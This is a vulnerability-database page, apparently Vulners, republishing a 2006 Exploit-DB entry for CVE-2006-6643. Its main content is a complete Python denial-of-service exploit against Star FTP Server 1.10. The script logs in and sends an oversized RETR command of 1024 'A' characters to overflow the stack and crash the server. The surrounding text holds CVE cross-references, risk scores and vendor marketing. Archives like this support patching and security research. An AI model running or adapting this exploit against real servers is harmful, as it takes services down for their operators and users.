Lucene search
+L

Star FTP Server 1.10 - 'RETR' Remote Denial of Service

🗓️ 17 Dec 2006 00:00:00Reported by NecroType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Star FTP Server 1.10 remote denial of service exploit using stack overflow vulnerability.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2006-6643
20 Dec 200602:00
cve
Cvelist
CVE-2006-6643
20 Dec 200602:00
cvelist
EUVD
EUVD-2006-6626
7 Oct 202500:30
euvd
NVD
CVE-2006-6643
20 Dec 200602:28
nvd
# Star FTP server 1.10
# Bug type: stack overflow
# Found by Necro <neco * ihack.pl> http://iHACK.pl

from socket import *
from sys import exit

print '\n[*] Star FTP server 1.10 Remote 0day DoS Exploit'
print '[*] Bug found by Necro <necro*ihack.pl> http://iHACK.pl'

host = '127.0.0.1'
port = 21

username = 'necro'
password = 'dupa'

evil = 'RETR' + '\x20' + '\x41' * 1024 + '\r\n'

s = socket(AF_INET, SOCK_STREAM)
try:
   s.connect((host, port))
except:
   print '\n[-] Connection Error'
   exit()

s.recv(1024)
s.send('USER' + '\x20' + username + '\r\n')
s.recv(1024)
s.send('PASS' + '\x20' + password + '\r\n')
s.recv(1024)
s.send('PORT 2000\r\n')
s.recv(1024)
s.send(evil)
s.recv(1024)
s.send(evil)
s.close()

print '[+] Done, shutdown.'

# milw0rm.com [2006-12-17]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2011 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.0284
38